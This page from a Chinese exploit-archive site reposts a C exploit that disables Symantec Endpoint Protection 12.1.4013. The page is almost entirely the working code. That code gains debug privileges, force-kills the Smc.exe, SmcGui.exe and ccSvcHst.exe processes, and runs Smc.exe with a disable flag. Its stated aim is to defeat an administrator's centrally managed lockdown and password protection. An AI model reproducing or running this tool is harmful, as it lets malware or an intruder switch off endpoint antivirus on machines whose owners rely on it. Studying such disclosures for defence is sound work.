首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Symantec Endpoint Protection 12.1.4013 Denial Of Service
来源:hyp3rphp.altervista.org 作者:hyp3rphp 发布时间:2016-01-11  
#include <windows.h>
#include <Tlhelp32.h>
#define SMC_EXE "Smc.exe"
#define SMC_GUI "SmcGui.exe"
#define CC_SVC_HST "ccSvcHst.exe"

/*
By Gerardo Sanchez (hyp3rphp) - Dc 2014 - hyp3rphp.altervista.org
Symantec Endpoint Protection version 12.1.4013
First reported to Symantec - Jan 20, 2015

Goal:
Kill Symantec EP agent & services after globally locking down endpoint protection via the
Symantec central management server and enabling globally managed password protection controls. Tested successfully on Windows 7 SP1 result may vary OS to OS.

Scenario:
Run the from browser upon download or save to some directory and run
Not the most elegant code and I don't care...

*/

void el_crookedio_crosso(const char *victimo){
HANDLE hSnapShot=CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);
PROCESSENTRY32 pEntry;
pEntry.dwSize=sizeof(pEntry);
BOOL hRes=Process32First(hSnapShot,&pEntry);

while(hRes){
if(strcmp(pEntry.szExeFile,victimo)==0){
HANDLE hProcess=OpenProcess(PROCESS_TERMINATE,0,(DWORD)pEntry.th32ProcessID);
if (hProcess!=NULL){
TerminateProcess(hProcess,9);
CloseHandle(hProcess);
}
}
hRes=Process32Next(hSnapShot,&pEntry);
}
CloseHandle(hSnapShot);
}

DWORD exeo_de_pid(char *ghostofsin){
DWORD ret=0;
PROCESSENTRY32 pe32={sizeof (PROCESSENTRY32)};
HANDLE hProcSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if (hProcSnap==INVALID_HANDLE_VALUE) return 0;
if (Process32First (hProcSnap,&pe32))
do
if (!strcmp(pe32.szExeFile,ghostofsin)) {
ret=pe32.th32ProcessID;
break;
}
while (Process32Next (hProcSnap,&pe32));
CloseHandle (hProcSnap);
return ret;
}

void angelo_maliciouso(){
int AV=exeo_de_pid(SMC_EXE);
char id[8];
sprintf(id, "%d ", AV);
printf("%s", id);
char cmd[50]="Taskkill /F /PID ";
strcat(cmd, id);
system(cmd);

// system("Taskkill /F /IM Smc.exe"); //Access denied.
system("\"C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection\\Smc.exe\" -disable -ntp");

Sleep(1000);

el_crookedio_crosso(SMC_EXE);
el_crookedio_crosso(SMC_GUI);
el_crookedio_crosso(CC_SVC_HST);

}

int main(void){

puts("/*-----------------------------------------------------------*/\n"
);
puts("| EXORCIST DE SYMANTEC Antivirus version 12.1.4013 |\n");
puts("| By hyp3rphp - Jan 2015 |\n");
puts("/*------------------------------------------------------------*/\n
");

SetDebugPrivileges();
angelo_maliciouso();

Sleep(1000);

el_crookedio_crosso(SMC_EXE);
el_crookedio_crosso(SMC_GUI);
el_crookedio_crosso(CC_SVC_HST);

Sleep(2000);
angelo_maliciouso();

Sleep(6000);

return 0;
}

int SetDebugPrivileges(){
DWORD err=0;
TOKEN_PRIVILEGES Debug_Privileges;
if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&Debug_Privileges.Privileges
[0].Luid))return GetLastError();
HANDLE hToken=0;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken
)){
err=GetLastError();
if(hToken)CloseHandle(hToken);
return err;
}
Debug_Privileges.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
Debug_Privileges.PrivilegeCount=1;

if(!AdjustTokenPrivileges(hToken,FALSE,&Debug_Privileges,0,NULL,NULL)){
err=GetLastError();
if(hToken) CloseHandle(hToken);
}
return err;
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·D-Link DCS-931L Arbitrary File
·Linux Kernel overlayfs Local P
·Ubuntu 14.04 LTS, 15.10 overla
·Amanda <= 3.3.1 - Local Root E
·Rejetto HTTP File Server (HFS)
·KeePass Password Safe Classic
·KiTTY Portable <= 0.65.0.2p Lo
·TrendMicro node.js HTTP Server
·KiTTY Portable <= 0.65.0.2p Lo
·Grassroots DICOM (GDCM) 2.6.0
·KiTTY Portable <= 0.65.1.1p Lo
·FortiGate OS Version 4.x - 5.0
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved